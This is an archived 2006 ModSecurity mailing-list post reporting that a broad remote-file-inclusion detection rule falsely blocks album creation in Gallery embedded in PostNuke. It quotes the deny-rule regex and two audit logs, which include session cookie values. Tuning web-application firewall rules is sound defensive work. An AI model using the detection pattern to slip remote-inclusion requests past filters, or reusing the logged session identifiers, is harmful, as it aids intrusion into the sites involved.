[Modsecurity] False Positive from Gallery application

Sat Jun 10 21:39:05 EDT 2006

This rule:

#really broad furl_fopen attack sig

#tune this for your system

SecFilterSelective REQUEST_URI
"!(banner_click|wp-login|tiki-view_cache|/horde/index|/horde/services/go|/goto|g
allery2?/main)" chain

SecFilterSelective REQUEST_URI "\.php(3|4|5)?(\?|&).*=(ht|f)tps?:/.*(\?|&)"

Causes a false positive when a Gallery user tries to create a new album. At
least for those that have Gallery imbedded into PostNuke which two of the
domains on my server do.

Here's two audit entries from two different users:

==a3a30c72==============================
Request: www.DOMAINA.com <IP ADDRESS> - - [10/Jun/2006:20:28:25 --0500] "GET
/nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2F
nuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500
1402 "http://www.DOMAINA.com/nuke/html/modules/gallery/" "Mozilla/4.0
(compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)"
wAp60UIczXUAAFyP0c8AAAAM "-"
----------------------------------------
GET
/nuke/html/modules/gallery/do_command.php?return=http%3A%2F%2Fwww.DOMAINA.com%2F
nuke%2Fhtml%2Fmodules%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
application/x-shockwave-flash, application/vnd.ms-excel,
application/vnd.ms-powerpoint, application/msword, */*
Referer: http://www.DOMAINA.com/nuke/html/modules/gallery/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.1.4322)
Host: www.DOMAINA.com
Connection: Keep-Alive
Cookie: POSTNUKESID=f4a0458a85a5ff7cc62c85510811469f;
POSTNUKESID=aec2dac49a491e304beaa804257b632d;
phpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3BN%3Bs%3A6%3A%22userid%2
2%3Bs%3A1%3A%222%22%3B%7D; gallery_session_add_photos_mode=form;
phpbb2mysql_sid=5c52ed124857e5d615753e6bd65d0421;
phpbb2mysql_t=a%3A3%3A%7Bi%3A1057%3Bi%3A1149827453%3Bi%3A114%3Bi%3A1149861963%3B
i%3A1058%3Bi%3A1149862021%3B%7D; PHPSESSID=aa50a71cddfcc06039a7a5d6dfe368c4;
testing=1; sid=8c8eb42eadfcdc742030e34513a7e951
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match
"\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 06 Sep 2005 04:00:25 GMT
ETag: "134043-57a-77bb0840"
Accept-Ranges: bytes
Content-Length: 1402
Connection: close
Content-Type: text/html
--a3a30c72--

==c164ef16==============================
Request: morrowind.DOMAINB.com <IP ADDRESS> - - [10/Jun/2006:20:23:27 --0500]
"GET
/modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodu
les%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1" 500 1408
"http://morrowind.DOMAINB.com/modules/gallery/" "Mozilla/4.0 (compatible; MSIE
6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)" rkLfukIczXUAAAY8gMAAAAAI "-"
----------------------------------------
GET
/modules/gallery/do_command.php?return=http%3A%2F%2Fmorrowind.DOMAINB.com%2Fmodu
les%2Fgallery%2Fview_album.php&cmd=new-album HTTP/1.1
Accept: */*
Referer: http://morrowind.DOMAINB.com/modules/gallery/
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR
1.1.4322)
Host: morrowind.DOMAINB.com
Connection: Keep-Alive
Cookie:
pnphpbb2mysql_data=a%3A2%3A%7Bs%3A11%3A%22autologinid%22%3Bs%3A0%3A%22%22%3Bs%3A
6%3A%22userid%22%3Bs%3A1%3A%223%22%3B%7D;
POSTNUKESID=df57897f8dcbe1c40eb870d8789843c5;
PHPSESSID=34c42d9461125024a0929be9e98201a1
mod_security-action: 500
mod_security-message: Access denied with code 500. Pattern match
"\\.php(3|4|5)?(\\?|&).*=(ht|f)tps?:/.*(\\?|&)" at REQUEST_URI

HTTP/1.1 500 Internal Server Error
Last-Modified: Tue, 06 Sep 2005 04:01:49 GMT
ETag: "db401f-580-7cbcc540"
Accept-Ranges: bytes
Content-Length: 1408
Connection: close
Content-Type: text/html
--c164ef16--

-------------- next part --------------
An HTML attachment was scrubbed...
URL: http://lists.gotroot.com/pipermail/modsecurity/attachments/20060610/caa6538a/attachment.html